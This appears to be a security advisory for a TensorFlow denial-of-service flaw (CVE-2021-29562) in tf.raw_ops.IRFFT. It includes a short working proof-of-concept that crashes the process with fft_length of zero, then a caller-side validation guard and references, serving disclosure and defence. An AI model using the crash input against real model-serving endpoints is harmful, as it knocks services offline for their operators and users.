CVE-2021-29562: CHECK-fail in `tf.raw_ops.IRFFT`
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT:
import tensorflow as tf
values = [-10.0] * 130
values[0] = -9.999999999999995
# 10 x 13 complex64 input; the element values play no role in the crash
inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32)
inputs = tf.cast(inputs, dtype=tf.complex64)
# fft_length of 0 is the malicious argument
fft_length = tf.constant([0], shape=[1], dtype=tf.int32)
tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length)
Because fft_length is 0, the kernel hands Eigen an empty matrix to transform. Eigen's assertion fires and the process is terminated (a CHECK failure), so any service that lets a caller control fft_length, for instance a model-serving endpoint that accepts shapes from requests, can be crashed on demand. The fix (commit 1c56f53be0b722ca657cbc7df461ed676c8642a2, listed below) adds validation so the op rejects the degenerate input with an error instead of aborting the process.
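As an added example (not TensorFlow's code and not the upstream fix), the guard below applies the same idea as the patch on the caller's side: validate the shapes before the raw op runs, so a zero or negative fft_length is refused with an exception instead of aborting the process. It generalizes from the 1-D case in the PoC to IRFFT2D and IRFFT3D (fft_rank 2 and 3). The validator is pure Python and runs without TensorFlow; safe_irfft assumes TensorFlow is installed and eager execution is enabled.

```python
"""Caller-side guard for inverse real FFTs (tf.raw_ops.IRFFT and friends).

Added example, not TensorFlow's own code or its fix. The shape rule used here is
the documented IRFFT/IRFFT2D/IRFFT3D semantics: the innermost `fft_rank` input
dims are replaced by `fft_length`. The validator is pure Python so it can be
exercised without TensorFlow installed.
"""
from typing import List, Sequence


def irfft_output_shape(input_shape: Sequence[int],
                       fft_length: Sequence[int],
                       fft_rank: int = 1) -> List[int]:
    """Validate (input_shape, fft_length) for an inverse real FFT and return
    the output shape. fft_rank 1/2/3 corresponds to IRFFT/IRFFT2D/IRFFT3D.

    Raises ValueError for the degenerate shapes that, on unpatched TensorFlow,
    reach the Eigen FFT code as an empty matrix and trip a CHECK (process abort).
    """
    if fft_rank not in (1, 2, 3):
        raise ValueError(f"fft_rank must be 1, 2 or 3, got {fft_rank}")
    if len(fft_length) != fft_rank:
        raise ValueError(
            f"fft_length must have {fft_rank} element(s), got {len(fft_length)}")
    if len(input_shape) < fft_rank:
        raise ValueError(
            f"input rank {len(input_shape)} is below fft_rank {fft_rank}")
    for i, n in enumerate(fft_length):
        # fft_length [0] is exactly the PoC input: a length-0 output means an
        # empty matrix inside the kernel.
        if n < 1:
            raise ValueError(
                f"fft_length[{i}] = {n}; every transform length must be >= 1")
    # The innermost fft_rank dims of the input are replaced by fft_length.
    return [int(d) for d in input_shape[:-fft_rank]] + [int(n) for n in fft_length]


def is_rejected(input_shape, fft_length, fft_rank=1) -> bool:
    """True if the validator refuses this (input_shape, fft_length) pair."""
    try:
        irfft_output_shape(input_shape, fft_length, fft_rank)
    except ValueError:
        return True
    return False


def safe_irfft(inputs, fft_length):
    """Validate, then dispatch to tf.raw_ops.IRFFT.

    Assumes TensorFlow is installed and eager execution is on (so shapes and
    fft_length are concrete). Imported lazily so the validator above stays
    usable without TensorFlow.
    """
    import tensorflow as tf  # assumption: tensorflow available at call time

    lengths = [int(v) for v in tf.reshape(fft_length, [-1]).numpy()]
    irfft_output_shape(inputs.shape.as_list(), lengths, fft_rank=1)
    return tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length)


if __name__ == "__main__":
    # The advisory's PoC arguments: complex64 [10, 13] input with fft_length [0].
    print(is_rejected([10, 13], [0]))           # True: refused before reaching the kernel
    print(irfft_output_shape([10, 13], [24]))  # [10, 24]: a well-formed call
```

In a serving context, call irfft_output_shape on the request-supplied shapes before building any tensors; a ValueError is a 4xx response, whereas the unpatched op would have taken the whole worker down. Upgrading to a fixed TensorFlow remains the real fix; this guard only narrows the window on hosts that cannot be patched yet.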
References
- github.com/advisories/GHSA-36vm-xw34-x4pj
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-490.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-688.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-199.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/1c56f53be0b722ca657cbc7df461ed676c8642a2
- github.com/tensorflow/tensorflow/security/advisories/GHSA-36vm-xw34-x4pj
- nvd.nist.gov/vuln/detail/CVE-2021-29562